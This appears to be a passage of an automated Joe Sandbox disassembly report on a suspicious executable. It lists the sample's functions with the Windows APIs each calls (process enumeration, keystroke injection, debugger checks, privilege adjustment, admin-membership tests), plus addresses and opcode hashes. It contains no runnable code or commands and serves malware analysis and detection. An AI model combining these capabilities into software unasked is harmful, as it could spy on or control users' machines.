Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: lstrlen
String ID: ($tb+$|
API String ID: 1659193697-4231914386
Opcode ID: 08a8b510c7b11f3f9309447c35bf50af5d693f9c5cdaf3481a1b8d2847446490
Instruction ID: f6304e0d443615902d854f2954e8c7a79800a790dfbb7b02bca7dfe3d94535ac
Opcode Fuzzy Hash: 08a8b510c7b11f3f9309447c35bf50af5d693f9c5cdaf3481a1b8d2847446490
Instruction Fuzzy Hash: 58323875A107069FC728CF19C08196AB7F0FF48710B15C46EE89AEB7A1EBB0E951CB44

Function 0027A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0027A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0027A6BA

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0027A79C
CloseHandle.KERNEL32(00000000), ref: 0027A7AB

Part of subcall function 0020CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00233303,?), ref: 0020CE8A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: f70db787c87040ff98c46623d1c8582ab0b523a5318029594e0e903a257b3fda
Instruction ID: 9a12b750f888f1d1577be3bd166914da855effb6d8ece6cbdf3f924f1ee0da1b
Opcode Fuzzy Hash: f70db787c87040ff98c46623d1c8582ab0b523a5318029594e0e903a257b3fda
Instruction Fuzzy Hash: BF516DB15083059FD710EF24D886A6FBBE8FF99754F00891DF58997292EB30D914CB92

Function 0025AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0025AAAC
SetKeyboardState.USER32(00000080), ref: 0025AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0025AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0025AB88

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: e9ac18d49ed07711800d925b84658834e5b40f703cac5b83e5ab76bd89d56a85
Instruction ID: 4e8e18d85af4452f528fda39164570c20c93c5ec8f638f73825acf95ad1c870e
Opcode Fuzzy Hash: e9ac18d49ed07711800d925b84658834e5b40f703cac5b83e5ab76bd89d56a85
Instruction Fuzzy Hash: 1E312E30A70205AEFF358F64CC06BFA77A6AB54326F14431BF881521D0D37589A9C7EA

Function 0026CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0026CE89
GetLastError.KERNEL32(?,00000000), ref: 0026CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0026CEFE

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: adbb54235f91eff0750b0f69e96ecc535ebb70199f6570c879aed4f1fe5f3f4c
Instruction ID: efc0e59924e357e35431513857dbfc93077356e1f504a75c999f9e7048c74236
Opcode Fuzzy Hash: adbb54235f91eff0750b0f69e96ecc535ebb70199f6570c879aed4f1fe5f3f4c
Instruction Fuzzy Hash: 9921C1B15103069BDB30EF65D948BA7B7FCEB50354F20441EE686D2151E771EE94CBA0

Function 00222622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0022271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00222724
UnhandledExceptionFilter.KERNEL32(?), ref: 00222731

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 34b0b8b8e0655290ade2b3b0809fad2bb0cbfeab49bb7b81e6a1b306be4e2f05
Instruction ID: b4602721e06fef6ce2be5e661b4c62942696753cb3c7da7c61bd1adc8dcef620
Opcode Fuzzy Hash: 34b0b8b8e0655290ade2b3b0809fad2bb0cbfeab49bb7b81e6a1b306be4e2f05
Instruction Fuzzy Hash: 5131C474911228ABCB21DF64DC887D9B7B8AF18310F5041EAE81CA6260E7709F958F44

Function 002651CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002651DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00265238
SetErrorMode.KERNEL32(00000000), ref: 002652A1

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 40dc59200126fd105123247f299e3d1d7e0c0d33ae4301b509cd7e3ba4b6c457
Instruction ID: d18dfdf4c14a7add1e65b916cf2e70b0f7483a4cc2494d6e67c7f0b753f24515
Opcode Fuzzy Hash: 40dc59200126fd105123247f299e3d1d7e0c0d33ae4301b509cd7e3ba4b6c457
Instruction Fuzzy Hash: 34315E75A10519DFDB00DF54D8D8EADBBB4FF48314F148099E909AB3A2DB31E856CBA0

Function 002516C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0020FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00210668
Part of subcall function 0020FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00210685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0025170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0025173A
GetLastError.KERNEL32 ref: 0025174A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: c9654888aeca60ed68458438024e1777f74b4ba0277156616e1340366564db2f
Instruction ID: 1318c919249327911fbed183facdebf688f897b43836babcd2c203d03dfda92e
Opcode Fuzzy Hash: c9654888aeca60ed68458438024e1777f74b4ba0277156616e1340366564db2f
Instruction Fuzzy Hash: FA1123B2424305AFD7289F64ECC6E6BB7BDEB44711B20802EF45653281EB70FC618B24

Function 0025D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0025D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0025D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0025D650

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: fee611aabaf6816393b2e0e93e2adede356070fdd45cb9c66a87b923e37cac3a
Instruction ID: eb3d21f23576957ddceda7c8a535f17ef03bd5f65e7535580d11bd1c55554104
Opcode Fuzzy Hash: fee611aabaf6816393b2e0e93e2adede356070fdd45cb9c66a87b923e37cac3a
Instruction Fuzzy Hash: 9C113C75E05228BBDB208F95AC49FAFBBBCEB45B50F108155F904E7290D6705A058BA1

Function 00251663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0025168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002516A1
FreeSid.ADVAPI32(?), ref: 002516B1

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: a1f8efc7b8294daf7295f1fd5bef77fa4db335f618c0b011ed55ca118bebf30a
Instruction ID: 0c6274869a84d1f79a85a932f9ff1ca98ba7fd15630f51547b2758d5c57639f4
Opcode Fuzzy Hash: a1f8efc7b8294daf7295f1fd5bef77fa4db335f618c0b011ed55ca118bebf30a
Instruction Fuzzy Hash: EAF04475951309FBDB00DFE0AC89EAEBBBCEB08240F204460E900E2181E330AA048B60

Function 00214CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(002228E9,?,00214CBE,002228E9,002B88B8,0000000C,00214E15,002228E9,00000002,00000000,?,002228E9), ref: 00214D09
TerminateProcess.KERNEL32(00000000,?,00214CBE,002228E9,002B88B8,0000000C,00214E15,002228E9,00000002,00000000,?,002228E9), ref: 00214D10
ExitProcess.KERNEL32 ref: 00214D22

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 55a25e1d769045634c75377276bcab9e1aeab4dc9714b69768794dec1bc47710
Instruction ID: d664ec524364187c6ce6db8c07c80c62799c6f76accfe76bf87c3616af95e32b
Opcode Fuzzy Hash: 55a25e1d769045634c75377276bcab9e1aeab4dc9714b69768794dec1bc47710
Instruction Fuzzy Hash: 25E0B635021148ABCF11BF54FD0DA983BA9FB55B81B204054FC0D8A122CB35DDA2DB90

Function 0022C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0022C36C

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 6b2be30d03773f7211936181ebe268eba4467f1ca5ff83a5ace27afc8be863f9
Instruction ID: d394a33b50708cfd9235cdc84691997069e28fe0fe478d964ef98b32b7d95817
Opcode Fuzzy Hash: 6b2be30d03773f7211936181ebe268eba4467f1ca5ff83a5ace27afc8be863f9
Instruction Fuzzy Hash: 18413A72510229BBCB24EFF9EC48EAF7778EB84314F2046A9F905C7180E6709D91CB50

Function 0024D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0024D28C

Strings

X64, xrefs: 0024D2A8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 691184ffa8b572a80ce0c65ecdb2c5d3f90f42cf63cae67941e5c78db8b25a4e
Instruction ID: f472d26fb3da40a8f27c08186db7a3a0bed462f7bdd02d4a8786d5dd8e49fa04
Opcode Fuzzy Hash: 691184ffa8b572a80ce0c65ecdb2c5d3f90f42cf63cae67941e5c78db8b25a4e
Instruction Fuzzy Hash: 00D0C9B482611DEBCB94CB90ECC8DD9B37CBB04345F100151F506A2140D7B095488F20

Function 0021CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: edf606ffebe2c56460c229e26ba9127df1fb5c0862b1638c0c9c4b9c1ce689ec
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 17023C75E502199BDF14CFA9D8806EEFBF1EF58324F25816AD819E7380D730AE518B84

Function 001FCAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00240C40
p#,, xrefs: 001FCF7F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#,
API String ID: 0-1661721550
Opcode ID: 77be0170f429ef5c23cdb35226a3470af109a47d41192b74b9173e53bbd8f8ae
Instruction ID: 71d02ce10dd40c471be701737d26e88fabb691dd2c41e4671b7225ea9c15dd20
Opcode Fuzzy Hash: 77be0170f429ef5c23cdb35226a3470af109a47d41192b74b9173e53bbd8f8ae
Instruction Fuzzy Hash: F032AD7091021DDBCF18DF94CA80AFDB7B5FF14304F144059EA06AB292DB75AE59EBA0

Function 002668EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00266918
FindClose.KERNEL32(00000000), ref: 00266961

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: e2db66df3290c08f005a72c00f83731532fa54f151e24fb1824b18aa368a7709
Instruction ID: c81b6f8268bdbb73d8d4f07933a6b8b902bfd0e33e7103ebcbf7e5a1b36dd8f6
Opcode Fuzzy Hash: e2db66df3290c08f005a72c00f83731532fa54f151e24fb1824b18aa368a7709
Instruction Fuzzy Hash: C311D0356142059FC710CF29D488A26BBE4FF84328F14C699E8698F6A2C730EC45CBD0

Function 002637B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00274891,?,?,00000035,?), ref: 002637E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00274891,?,?,00000035,?), ref: 002637F4

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: b812ef578d962de55e7d35c2cf8646924065462cbcdb75e2d26e67efba87ec37
Instruction ID: 93276f8a25a5f75225eececad243cd6137747c1815e46842ff3d3d2d96b9c7e7
Opcode Fuzzy Hash: b812ef578d962de55e7d35c2cf8646924065462cbcdb75e2d26e67efba87ec37
Instruction Fuzzy Hash: A1F0E5B46153292AE72067769C4DFEB7AAEEFC4761F000165F509D2281DA709944C7F0

Function 0025B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0025B25D
keybd_event.USER32(?,76AAC0D0,?,00000000), ref: 0025B270

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 4e4750ab5bb6b2114da296e5817988c7809b155adbe7ec1f4af4310b661f1162
Instruction ID: 18abd7c4fe2e6de1fb0c20654e529c0ed2e2a4049cbaee7799b23c57f223f358
Opcode Fuzzy Hash: 4e4750ab5bb6b2114da296e5817988c7809b155adbe7ec1f4af4310b661f1162
Instruction Fuzzy Hash: 9DF01D7581424EABDF059FA0D805BAE7BB4FF04305F108009FD55A5191C7798615DFA4

Function 002510BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002511FC), ref: 002510D4
CloseHandle.KERNEL32(?,?,002511FC), ref: 002510E9

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 0672e693cd6a63fbd2d4250875bb0006ee18214d48b85d627fd0517a11a5e2b3
Instruction ID: 722127c1d22f0f4c817c333b70ac836d2f204f970eb00a705ea060d746d92843
Opcode Fuzzy Hash: 0672e693cd6a63fbd2d4250875bb0006ee18214d48b85d627fd0517a11a5e2b3
Instruction Fuzzy Hash: E6E04831014701AEE7252B51FC09E7377A9EB04310B24842DF455804F1DB726CA0DB50

Function 0022676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00226766,?,?,00000008,?,?,0022FEFE,00000000), ref: 00226998

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 86bb7703f848f74df82cc5914fe04e50232d35c4ca6766c192fdd8c3422d9066
Instruction ID: ba739c9259b84667d2ddc9e621b0009fc1b5b81b365eef25968076b6de15d68c
Opcode Fuzzy Hash: 86bb7703f848f74df82cc5914fe04e50232d35c4ca6766c192fdd8c3422d9066
Instruction Fuzzy Hash: 33B19E32520619EFD718CF68D48AB647BE0FF05324F25C658E899CF2A2C735E9A5CB40

Function 0020B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0024851F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
